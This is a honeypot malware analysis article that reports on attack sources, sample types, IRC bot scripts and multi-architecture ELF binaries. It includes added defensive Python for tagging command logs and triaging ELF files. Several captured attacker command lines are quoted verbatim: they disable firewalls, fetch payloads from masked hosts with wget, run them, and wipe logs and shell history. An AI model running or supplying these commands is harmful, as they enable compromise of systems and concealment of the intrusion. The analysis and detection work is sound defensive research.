In previous articles, we have dealt with the detection of security incidents using honeypots and the kind of information that can be obtained by using them. Here, we are going to focus our attention on samples of malware that have been collected over the last few months.
Cybercriminals do not rest for a second and they are continually looking for vulnerable services exposed on the Internet that they can exploit. They often carry out this task in an automated fashion, with the aim of having as many compromised machines at their disposal as possible. They mainly target:
- Public services with weak credentials, such as FTP, SSH, RDP and VNC.
- Public services that are vulnerable in some way, as is the case with web servers. The aim is to distribute malware among the users of a specific website (XSS) or even to infect the web server itself (ShellShock).
In the vast majority of these attacks, the cybercriminal downloads some sort of malware onto the machine they have attacked. The malware comes either from the attacker's own machine or from another external machine that may also have been compromised previously.
Thanks to our honeypots, INCIBE collects a large quantity of samples every day from the different services exposed. These samples can then be analysed and identified, yielding very valuable information about them, such as:
- Where the attackers are from
- Where the malware distributors come from
- Download URLs
- Type of sample
- Control Panels (C&C)
Over the last few months, we have collected a total of 1,626 samples, with a large number of attacks originating from countries such as China, the United States, Canada and Holland.
Below, we analyse each type of file we collected that is relevant to our investigation:
- ShellScripts: 83% of the samples collected are bash scripts that the attacker downloads onto the compromised machine, either from the attacking machine itself or from another machine:
/etc/init.d/iptables stop; service iptables stop;SuSefirewall2 stop; reSuSefirewall2 stop; wget -c http://61.X.X.X:80/likds;chmod 777 likds;./likds;
/etc/init.d/iptables stop; service iptables stop;SuSefirewall2 stop; reSuSefirewall2 stop; wget -c http://61.X.X.X:80/likds;chmod 777 32ouk;./32ouk;
/etc/init.d/iptables stop; service iptables stop;SuSefirewall2 stop; reSuSefirewall2 stop; wget -c http://61.X.X.X:80/likds;chmod 777 64rth;./64rth;
In this example, the attacker disables the firewall services before downloading and then running the malware.
cd /tmp && rm -rf dbus.sh && wget -q http://93.X.X.X/mw.pl && perl mw.pl && rm -rf mw.pl && rm -rf /var/log/lastlog && rm -rf .bash_history && history -c
cd /tmp/; wget -q http://93.X.X.X/dbus.sh > /dev/null 2>&1; chmod +x dbus.sh> /dev/null 2>&1 ; ./dbus.sh > /dev/null 2>&1; rm -rf dbus.sh.1; rm -rf /var/log/lastlog; history -c
In this example, the attacker downloads the sample and then goes on to delete the logs and clean up the history.
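The behaviours in the two captures above (firewall shutdown, remote download, execution of the fetched file, log and history wiping) can be tagged automatically when reviewing honeypot command logs. The following is an added example, not INCIBE's tooling: the tag names, the sample lines, the documentation-range IP addresses and the file names are all constructed for illustration.

```python
import posixpath
import re

# Service names as they appear in the captured lines on the page, lower-cased.
FIREWALL = {"iptables", "susefirewall2", "resusefirewall2"}
INTERPRETERS = {"perl", "sh", "bash", "python"}
WIPE_TARGETS = ("/var/log/", ".bash_history")
URL_RE = re.compile(r"https?://[^\s'\"<>]+")

def split_commands(line):
    """Split a captured shell line into simple commands, dropping redirections."""
    parts = re.split(r";|&&|\|\|", line)
    cleaned = (re.sub(r"\s*\d*>\s*\S+", "", p).strip() for p in parts)
    return [c for c in cleaned if c]

def analyse(line):
    """Return (sorted behaviour tags, download URLs) for one command line."""
    tags, urls, staged = set(), [], set()   # staged: files fetched or chmod-ed
    for cmd in split_commands(line):
        argv = cmd.split()
        base, args = posixpath.basename(argv[0]), argv[1:]
        prog = base.lower()
        names = {posixpath.basename(a) for a in args}
        if prog == "service" and args:      # "service iptables stop"
            prog, args = args[0].lower(), args[1:]
        if prog in FIREWALL and "stop" in args:
            tags.add("firewall_disabled")
        elif prog in ("wget", "curl") and URL_RE.search(cmd):
            found = URL_RE.findall(cmd)
            urls += found
            staged |= {posixpath.basename(u) for u in found}
            tags.add("remote_download")
        elif prog == "chmod":
            staged |= {posixpath.basename(a) for a in args[1:]}
        elif prog == "rm" and any(t in a for a in args for t in WIPE_TARGETS):
            tags.add("log_wiping")
        elif prog == "history" and "-c" in args:
            tags.add("history_cleared")
        elif ("/" in argv[0] and base in staged) or (prog in INTERPRETERS and names & staged):
            tags.add("payload_executed")
    return sorted(tags), urls

# Constructed sample lines modelled on the captures above (not real indicators).
LINE_A = ("/etc/init.d/iptables stop; service iptables stop;SuSefirewall2 stop; "
          "wget -c http://192.0.2.10:80/sample_a;chmod 777 sample_a;./sample_a;")
LINE_B = ("cd /tmp && wget -q http://198.51.100.7/stage.pl > /dev/null 2>&1 && perl stage.pl "
          "&& rm -rf stage.pl && rm -rf /var/log/lastlog && rm -rf .bash_history && history -c")
```

Because a file counts as staged once it has been either downloaded or made executable, a run of `./name` is still tagged when the executed name differs from the one in the download URL.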
The downloaded samples run as follows:
These samples contain links to other machines where the malware is stored. These links do not usually remain active for long. When similar samples are analysed, it becomes apparent that the same type of malware is downloaded from different machines that distribute it.
The attackers do not check the architecture of the machine they have attacked to find out which malware to download; rather they download the same malware that has been compiled for different architectures and run all of them. This ensures one of them works. An example of this is shown below:
As we have mentioned, at other times the malware is downloaded from the attacking machine itself using SFTP. These are usually non-automated attacks carried out by a human being.
20% of the samples go undetected by antivirus engines at the moment the download occurs. It often takes 24 to 72 hours for the samples to be detected by the antivirus engines, but there are other samples that take even more time to be detected.
- Octet-Stream: These represent 11.44% of downloaded samples and are Perl scripts catalogued as Trojan.PerlBot. A high percentage are the same type of sample with some details modified, such as the control server, the administrators’ names or the channel’s name. Out of a total of 186 samples, 38 are unique. When they are run, the compromised machine connects to an IRC channel from which it receives commands.
[Figure: IRC Bot channel administrators]
- Text-Plain: These represent 11.69% of the samples gathered. As with the ShellScript samples, they contain links to samples for different architectures, all of which are then run on the attacked machine.
[Figure: Sample of commands run by attacker and malware download]
- Executable and Linkable Format (ELF): They make up 23.19% of samples downloaded onto the compromised machine, either through Wget, cURL, SFTP or SSH, from other compromised servers or through FTP. A total of 377 executable files have been obtained, of which 71 are unique samples. When the analysis was being carried out, a total of 10 samples went undetected by the antivirus engines.
100% of the samples are ELF files which are executable on Linux systems. In automated attacks, the same sample is downloaded numerous times onto the same compromised machine, originating either from the same place or from different places. We also see different versions of the same malware.
The same type of malware is distributed over a set period of time, after which another type of threat will appear which replaces the previous one.
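Two observations above lend themselves to automated triage: the same binary arriving many times from different sources, and the same malware shipped as builds for several architectures. The following added example (not INCIBE's code) collapses repeated downloads by SHA-256 and reads the target architecture from each ELF header; the download list is built from constructed 20-byte header stubs with documentation-range addresses, not real samples.

```python
import hashlib
import struct
from collections import defaultdict

# e_machine values from the ELF specification (subset).
E_MACHINE = {3: "x86", 8: "MIPS", 20: "PowerPC", 40: "ARM", 62: "x86-64", 183: "AArch64"}

def elf_info(data):
    """Return (bits, endianness, architecture) from an ELF header, or None."""
    if len(data) < 20 or data[:4] != b"\x7fELF":
        return None
    ei_class, ei_data = data[4], data[5]
    if ei_class not in (1, 2) or ei_data not in (1, 2):
        return None                      # malformed identification bytes
    order = "<" if ei_data == 1 else ">"
    (machine,) = struct.unpack_from(order + "H", data, 18)  # e_machine, offset 18
    return (32 if ei_class == 1 else 64, "little" if ei_data == 1 else "big",
            E_MACHINE.get(machine, f"unknown({machine})"))

def triage(downloads):
    """Collapse repeated downloads by SHA-256; downloads is [(source_url, bytes)]."""
    unique = defaultdict(lambda: {"count": 0, "sources": set(), "elf": None})
    for source, data in downloads:
        entry = unique[hashlib.sha256(data).hexdigest()]
        entry["count"] += 1
        entry["sources"].add(source)
        entry["elf"] = elf_info(data)
    return dict(unique)

def fake_elf(ei_class, ei_data, machine, tag):
    """Constructed sample: a 20-byte ELF header stub plus a tag, not real malware."""
    order = "<" if ei_data == 1 else ">"
    ident = b"\x7fELF" + bytes([ei_class, ei_data, 1]) + b"\x00" * 9
    return ident + struct.pack(order + "HH", 2, machine) + tag

# Constructed download log: one family built for four architectures,
# with the x86 build fetched three times from two different hosts.
DOWNLOADS = [
    ("http://192.0.2.10/a", fake_elf(1, 1, 3, b"v1")),
    ("http://198.51.100.7/a", fake_elf(1, 1, 3, b"v1")),
    ("http://192.0.2.10/b", fake_elf(1, 2, 8, b"v1")),
    ("http://192.0.2.10/c", fake_elf(1, 1, 40, b"v1")),
    ("http://192.0.2.10/d", fake_elf(2, 1, 62, b"v1")),
    ("http://192.0.2.10/a", fake_elf(1, 1, 3, b"v1")),
]

if __name__ == "__main__":
    for digest, entry in triage(DOWNLOADS).items():
        print(digest[:12], entry["count"], entry["elf"], sorted(entry["sources"]))
```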
- Other detected campaigns: In some cases, attackers do not download malware onto the machine but carry out other tasks, the most notable being:
  - Click fraud attacks, as dealt with in previous articles
  - Checking that a vulnerable computer is available for future attacks
  - Changing root users’ passwords